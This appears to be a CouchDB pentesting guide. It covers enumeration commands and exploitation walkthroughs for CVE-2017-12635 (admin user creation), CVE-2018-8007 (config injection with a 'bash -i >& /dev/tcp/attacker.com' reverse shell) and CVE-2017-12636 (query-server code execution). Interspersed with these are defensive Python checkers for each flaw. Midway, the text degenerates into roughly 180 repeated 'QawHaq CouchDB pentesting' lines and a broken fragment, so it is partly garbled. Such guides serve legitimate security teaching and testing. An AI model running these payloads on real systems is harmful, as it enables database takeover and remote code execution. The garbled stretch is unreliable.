5984,6984 - Pentesting CouchDB
Basic Information
CouchDB is a versatile and powerful document-oriented database that organizes data using a key-value map structure within each document. Fields within the document can be represented as key/value pairs, lists, or maps, providing flexibility in data storage and retrieval.
Every document stored in CouchDB is assigned a unique identifier (_id) at the document level. Additionally, each modification made and saved to the database is assigned a revision number (_rev). This revision number allows for efficient tracking and management of changes, facilitating easy retrieval and synchronization of data within the database.
Default port: 5984(http), 6984(https)
PORT STATE SERVICE REASON
5984/tcp open unknown syn-ack
Automatic Enumeration
nmap -sV --script couchdb-databases,couchdb-stats -p <PORT> <IP>
msf> use auxiliary/scanner/couchdb/couchdb_enum
Manual Enumeration
Banner
curl http://IP:5984/
This issues a GET request to the CouchDB instance. The reply should look like one of the following:
{"couchdb":"Welcome","version":"0.10.1"}
{"couchdb":"Welcome","version":"2.0.0","vendor":{"name":"The Apache Software Foundation"}}
{% hint style="info" %}
Note that if accessing the root of CouchDB returns a 401 Unauthorized, you will not be able to access the banner or any other endpoint without valid credentials.
{% endhint %}
curl -X GET http://IP:5984/_all_dbs
If that request responds with a 401 unauthorised, then you need valid credentials to access the database:
curl -X GET http://user:password@IP:5984/_all_dbs
To find valid credentials you could try to [bruteforce the service](../generic-methodologies-and-resources/brute-force.md#couchdb).
This is an example of a CouchDB response when you have enough privileges to list databases (it's just a list of DBs):
["_global_changes","_metadata","_replicator","_users","passwords","simpsons"]
Database Info
You can obtain some database info (like the number of files and sizes) by accessing the database name:
curl http://IP:5984/<database>
curl http://localhost:5984/simpsons
#Example response:
{"db_name":"simpsons","update_seq":"7-g1AAAAFTeJzLYWBg4MhgTmEQTM4vTc5ISXLIyU9OzMnILy7JAUoxJTIkyf___z8rkQmPoiQFIJlkD1bHjE-dA0hdPFgdAz51CSB19WB1jHjU5bEASYYGIAVUOp8YtQsgavfjtx-i9gBE7X1i1D6AqAX5KwsA2vVvNQ","sizes":{"file":62767,"external":1320,"active":2466},"purge_seq":0,"other":{"data_size":1320},"doc_del_count":0,"doc_count":7,"disk_size":62767,"disk_format_version":6,"data_size":2466,"compact_running":false,"instance_start_time":"0"}
Document List
List every entry inside a database:
curl -X GET http://IP:5984/{dbname}/_all_docs
curl http://localhost:5984/simpsons/_all_docs
#Example response:
{"total_rows":7,"offset":0,"rows":[
{"id":"f0042ac3dc4951b51f056467a1000dd9","key":"f0042ac3dc4951b51f056467a1000dd9","value":{"rev":"1-fbdd816a5b0db0f30cf1fc38e1a37329"}},
{"id":"f53679a526a868d44172c83a61000d86","key":"f53679a526a868d44172c83a61000d86","value":{"rev":"1-7b8ec9e1c3e29b2a826e3d14ea122f6e"}},
{"id":"f53679a526a868d44172c83a6100183d","key":"f53679a526a868d44172c83a6100183d","value":{"rev":"1-e522ebc6aca87013a89dd4b37b762bd3"}},
{"id":"f53679a526a868d44172c83a61002980","key":"f53679a526a868d44172c83a61002980","value":{"rev":"1-3bec18e3b8b2c41797ea9d61a01c7cdc"}},
{"id":"f53679a526a868d44172c83a61003068","key":"f53679a526a868d44172c83a61003068","value":{"rev":"1-3d2f7da6bd52442e4598f25cc2e84540"}},
{"id":"f53679a526a868d44172c83a61003a2a","key":"f53679a526a868d44172c83a61003a2a","value":{"rev":"1-4446bfc0826ed3d81c9115e450844fb4"}},
{"id":"f53679a526a868d44172c83a6100451b","key":"f53679a526a868d44172c83a6100451b","value":{"rev":"1-3f6141f3aba11da1d65ff0c13fe6fd39"}}
]}
Read Document
Read the content of a document inside a database:
curl -X GET http://IP:5984/{dbname}/{id}
curl http://localhost:5984/simpsons/f0042ac3dc4951b51f056467a1000dd9
#Example response:
{"_id":"f0042ac3dc4951b51f056467a1000dd9","_rev":"1-fbdd816a5b0db0f30cf1fc38e1a37329","character":"Homer","quote":"Doh!"}
CouchDB Privilege Escalation CVE-2017-12635
Thanks to the differences between the Erlang and JavaScript JSON parsers, you could create an admin user with credentials hacktricks:hacktricks with the following request:
curl -X PUT -d '{"type":"user","name":"hacktricks","roles":["_admin"],"roles":[],"password":"hacktricks"}' localhost:5984/_users/org.couchdb.user:hacktricks -H "Content-Type:application/json"
More information about this vuln here.
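A defensive check for the request above, as an added example that is not part of the original page: it parses a `_users` document body while keeping repeated keys, then compares the reading a first-value-wins parser would produce with that of a last-value-wins parser, which is the kind of disagreement this CVE depends on. The function names and the sample bodies are constructed for illustration.

```python
import json

# Constructed sample bodies: the request body shown on this page and an
# ordinary user document (hypothetical user "alice").
SUSPICIOUS_BODY = ('{"type":"user","name":"hacktricks","roles":["_admin"],'
                   '"roles":[],"password":"hacktricks"}')
BENIGN_BODY = '{"type":"user","name":"alice","roles":[],"password":"x"}'


class _Pairs(list):
    """A JSON object kept as ordered (key, value) pairs, repeats included."""


def parse_preserving_duplicates(text):
    # object_pairs_hook receives every key in document order, so repeated
    # keys are not silently collapsed the way a plain dict would do.
    return json.loads(text, object_pairs_hook=_Pairs)


def resolve(node, pick):
    """Collapse the pair form into dicts; pick is 'first' or 'last'."""
    if isinstance(node, _Pairs):
        out = {}
        for key, value in node:
            if pick == "first" and key in out:
                continue  # first-wins: ignore later repeats
            out[key] = resolve(value, pick)  # last-wins: overwrite
        return out
    if isinstance(node, list):
        return [resolve(v, pick) for v in node]
    return node


def duplicate_keys(node, path="$"):
    """Return [(json_path, key)] for every key repeated within one object."""
    found = []
    if isinstance(node, _Pairs):
        seen = set()
        for key, value in node:
            if key in seen:
                found.append((path, key))
            seen.add(key)
            found.extend(duplicate_keys(value, f"{path}.{key}"))
    elif isinstance(node, list):
        for i, value in enumerate(node):
            found.extend(duplicate_keys(value, f"{path}[{i}]"))
    return found


def inspect_user_doc(text):
    """Summarise how differently two parsers could read a _users document."""
    tree = parse_preserving_duplicates(text)
    if not isinstance(tree, _Pairs):
        raise ValueError("a _users document must be a JSON object")
    first, last = resolve(tree, "first"), resolve(tree, "last")
    return {
        "duplicates": duplicate_keys(tree),
        "roles_first_wins": first.get("roles"),
        "roles_last_wins": last.get("roles"),
        # Any disagreement means validation and storage may see different data.
        "parser_disagreement": first != last,
    }


if __name__ == "__main__":
    for body in (SUSPICIOUS_BODY, BENIGN_BODY):
        print(inspect_user_doc(body))
```

Rejecting any body for which `duplicates` is non-empty, for example at a reverse proxy in front of port 5984, removes the ambiguity regardless of which value each parser would keep.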
CouchDB RCE
Erlang Cookie Security Overview
Example from here.
In the CouchDB documentation, specifically in the section concerning cluster set-up (link), the use of ports by CouchDB in a cluster mode is discussed. It's mentioned that, as in standalone mode, port 5984 is used. Additionally, port 5986 is for node-local APIs, and importantly, Erlang requires TCP port 4369 for the Erlang Port Mapper Daemon (EPMD), facilitating node communication within an Erlang cluster. This setup forms a network where each node is interlinked with every other node.
A crucial security advisory is highlighted regarding port 4369. If this port is made accessible over the Internet or any untrusted network, the system's security heavily relies on a unique identifier known as the "cookie." This cookie acts as a safeguard. For instance, in a given process list, the cookie named "monster" might be observed, indicating its operational role in the system's security framework.
www-data@canape:/$ ps aux | grep couchdb
root 744 0.0 0.0 4240 640 ? Ss Sep13 0:00 runsv couchdb
root 811 0.0 0.0 4384 800 ? S Sep13 0:00 svlogd -tt /var/log/couchdb
homer 815 0.4 3.4 649348 34524 ? Sl Sep13 5:33 /home/homer/bin/../erts-7.3/bin/beam -K true -A 16 -Bd -- -root /home/homer/b
Exploiting CVE-2018-8007 through Modification of local.ini
Example from here.
A recently disclosed vulnerability, CVE-2018-8007, affecting Apache CouchDB was explored, revealing that exploitation requires write permissions to the local.ini file. Although not directly applicable to the initial target system due to security restrictions, modifications were made to grant write access to the local.ini file for exploration purposes. Detailed steps and code examples are provided below, demonstrating the process.
First, the environment is prepared by ensuring the local.ini file is writable, verified by listing the permissions:
ls -l /etc/couchdb/local.ini
If the file is not writable, the permissions can be changed using the following command:
chmod +w /etc/couchdb/local.ini
Once the file is writable, the next step is to modify the local.ini file to enable the vulnerable feature. This can be done by adding the following line to the file:
[couchdb]
os_process_timeout=20000
After making the necessary changes, save the file and restart the CouchDB service for the modifications to take effect.
root@canape:/home/homer/etc# ls -l
-r--r--r-- 1 homer homer 18477 Jan 20 2018 default.ini
-rw-rw-rw- 1 homer homer 4841 Sep 14 17:39 local.ini
-r--r--r-- 1 root root 4841 Sep 14 14:30 local.ini.bk
-r--r--r-- 1 homer homer 1345 Jan 14 2018 vm.args
To exploit the vulnerability, a curl command is executed, targeting the cors/origins configuration in local.ini. This injects a new origin along with additional commands under the [os_daemons] section, aiming to execute arbitrary code:
curl -X PUT http://localhost:5984/_config/cors/origins -d '"http://attacker.com"'
curl -X PUT http://localhost:5984/_config/cors/origins -d '"http://attacker.com", "bash -i >& /dev/tcp/attacker.com/1234 0>&1"'
www-data@canape:/dev/shm$ curl -X PUT 'http://0xdf:df@localhost:5984/_node/couchdb@localhost/_config/cors/origins' -H "Accept: application/json" -H "Content-Type: application/json" -d "0xdf\n\n[os_daemons]\ntestdaemon = /usr/bin/touch /tmp/0xdf"
Subsequent verification shows the injected configuration in local.ini, contrasting it with a backup to highlight the changes:
root@canape:/home/homer/etc# diff local.ini local.ini.bk
119,124d118
< [cors]
< origins = 0xdf
< [os_daemons]
< test_daemon = /usr/bin/touch /tmp/0xdf
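Two defensive checks that follow from the diff above, as an added example that is not part of the original page: compare local.ini with a known-good copy and report new entries in `[os_daemons]`, and flag `_config` request bodies whose value contains a line break before it can reach the file. The sample file contents, request bodies and function names are constructed for illustration.

```python
import json
import re

SECTION_RE = re.compile(r"^\s*\[([^\]]+)\]\s*$")

# Sections whose values are launched as programs. Only [os_daemons] is named
# on this page; extend the set for the CouchDB version you run (assumption).
EXEC_SECTIONS = {"os_daemons"}

# Constructed samples modelled on the listing above (not real files).
BASELINE_INI = "[couchdb]\nuuid = example\n\n[admins]\n; no admins yet\n"
CURRENT_INI = (BASELINE_INI +
               "[cors]\norigins = 0xdf\n\n"
               "[os_daemons]\ntest_daemon = /usr/bin/touch /tmp/0xdf\n")
BENIGN_BODY = '"http://example.org"'
INJECTED_BODY = '"0xdf\\n\\n[os_daemons]\\ntestdaemon = /usr/bin/touch /tmp/0xdf"'


def parse_ini(text):
    """Minimal ini reader: {section: {key: value}}, comments ignored."""
    sections, current = {}, None
    for line in text.splitlines():
        stripped = line.strip()
        if not stripped or stripped[0] in ";#":
            continue
        match = SECTION_RE.match(line)
        if match:
            current = match.group(1).strip()
            sections.setdefault(current, {})
        elif "=" in line and current is not None:
            key, value = line.split("=", 1)
            sections[current][key.strip()] = value.strip()
    return sections


def added_settings(baseline_text, current_text):
    """Return [(section, key, value)] that are new or changed vs. baseline."""
    base, cur = parse_ini(baseline_text), parse_ini(current_text)
    added = []
    for section, items in cur.items():
        for key, value in items.items():
            if base.get(section, {}).get(key) != value:
                added.append((section, key, value))
    return added


def exec_findings(baseline_text, current_text):
    """Subset of added settings that live in a program-launching section."""
    return [entry for entry in added_settings(baseline_text, current_text)
            if entry[0] in EXEC_SECTIONS]


def body_breaks_out_of_value(raw_body):
    """True if a _config PUT body would span more than one ini line."""
    try:
        value = json.loads(raw_body)
    except ValueError:
        value = raw_body  # not valid JSON: inspect the raw text instead
    if not isinstance(value, str):
        value = raw_body
    # A config value is a single line; CR or LF lets it start a new section.
    return "\n" in value or "\r" in value


if __name__ == "__main__":
    print(exec_findings(BASELINE_INI, CURRENT_INI))
    print(body_breaks_out_of_value(BENIGN_BODY),
          body_breaks_out_of_value(INJECTED_BODY))
```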
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
**QawHaq CouchDB
root@canape:/home/homer/bin# ps aux | grep couch
With the CouchDB process identified, killing it causes the injected command to run, which creates the file:
root@canape:/home/homer/etc# kill 711
root@canape:/home/homer/etc# ls /tmp/0xdf
/tmp/0xdf
Exploring CVE-2017-12636 with Write Permissions on local.ini
Example from here.
A vulnerability known as CVE-2017-12636 was explored, which enables code execution via the CouchDB process, although specific configurations may prevent its exploitation. Despite numerous Proof of Concept (POC) references available online, adjustments are necessary to exploit the vulnerability on CouchDB version 2, differing from the commonly targeted version 1.x. The initial steps involve verifying the CouchDB version and confirming the absence of the expected query servers path:
curl http://localhost:5984
curl http://0xdf:df@localhost:5984/_config/query_servers/
To accommodate CouchDB version 2.0, a new path is utilized:
curl 'http://0xdf:df@localhost:5984/_membership'
curl http://0xdf:df@localhost:5984/_node/couchdb@localhost/_config/query_servers
Attempts to add and invoke a new query server were met with permission-related errors, as indicated by the following output:
curl -X PUT 'http://0xdf:df@localhost:5984/_node/couchdb@localhost/_config/query_servers/cmd' -d '"/sbin/ifconfig > /tmp/df"'
cp /home/homer/etc/local.ini /home/homer/etc/local.ini.b
chmod 666 /home/homer/etc/local.ini
Subsequent attempts to add the query server succeeded, as demonstrated by the lack of error messages in the response. The successful modification of the local.ini file was confirmed through file comparison:
curl -X PUT 'http://0xdf:df@localhost:5984/_node/couchdb@localhost/_config/query_servers/cmd' -d '"/sbin/ifconfig > /tmp/df"'
The process continued with the creation of a database and a document, followed by an attempt to execute code via a custom view mapping to the newly added query server:
curl -X PUT 'http://0xdf:df@localhost:5984/df'
curl -X PUT 'http://0xdf:df@localhost:5984/df/zero' -d '{"_id": "HTP"}'
curl -X PUT 'http://0xdf:df@localhost:5984/df/_design/zero' -d '{"_id": "_design/zero", "views": {"anything": {"map": ""} }, "language": "cmd"}'
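The walkthrough above depends on two host conditions: a local.ini that accounts other than the owner can write (the chmod 666 step) and a [query_servers] entry that launches something other than a view interpreter. The following audit for both is an added example, not code from the original page or from the CouchDB project. The function names, the `couchjs` allowlist and the sample file are assumptions made for illustration.

```python
import configparser
import os
import re
import stat

# Assumption: the only binary a query server should launch on this host.
ALLOWED_BINARIES = {"couchjs"}

# Characters that have no place in a plain interpreter command line.
SHELL_META = re.compile(r"[;&|<>`$]")

# Constructed sample: a stock-looking entry plus the "cmd" entry from the
# walkthrough above.
SAMPLE_LOCAL_INI = """\
; constructed sample local.ini
[couchdb]
uuid = 00000000000000000000000000000000

[query_servers]
javascript = /usr/bin/couchjs /usr/share/couchdb/server/main.js
cmd = /sbin/ifconfig > /tmp/df
"""


def audit_query_servers(ini_text, allowed=ALLOWED_BINARIES):
    """Return [(name, command, [reasons])] for suspicious [query_servers] entries."""
    parser = configparser.ConfigParser(
        interpolation=None,      # values may contain '%'
        strict=False,            # tolerate repeated sections and keys
        delimiters=("=",),
        allow_no_value=True,
    )
    parser.optionxform = str     # keep key case as written
    parser.read_string(ini_text)

    findings = []
    if not parser.has_section("query_servers"):
        return findings
    for name, command in parser.items("query_servers"):
        command = (command or "").strip()
        words = command.split()
        binary = os.path.basename(words[0]) if words else ""
        reasons = []
        if binary not in allowed:
            reasons.append("binary not in allowlist")
        if SHELL_META.search(command):
            reasons.append("shell metacharacters")
        if reasons:
            findings.append((name, command, reasons))
    return findings


def writable_by_non_owner(path):
    """True if group or other may write the file (for example mode 666)."""
    mode = os.stat(path).st_mode
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit_file(path):
    """Audit one ini file on disk: permissions plus [query_servers] content."""
    with open(path, encoding="utf-8") as handle:
        text = handle.read()
    return {
        "path": path,
        "writable_by_non_owner": writable_by_non_owner(path),
        "query_server_findings": audit_query_servers(text),
    }


if __name__ == "__main__":
    for name, command, reasons in audit_query_servers(SAMPLE_LOCAL_INI):
        print(f"[!] query_servers/{name} = {command!r}: {', '.join(reasons)}")
```

Run `audit_file()` against every ini file the CouchDB instance loads, since a later file can override an earlier one.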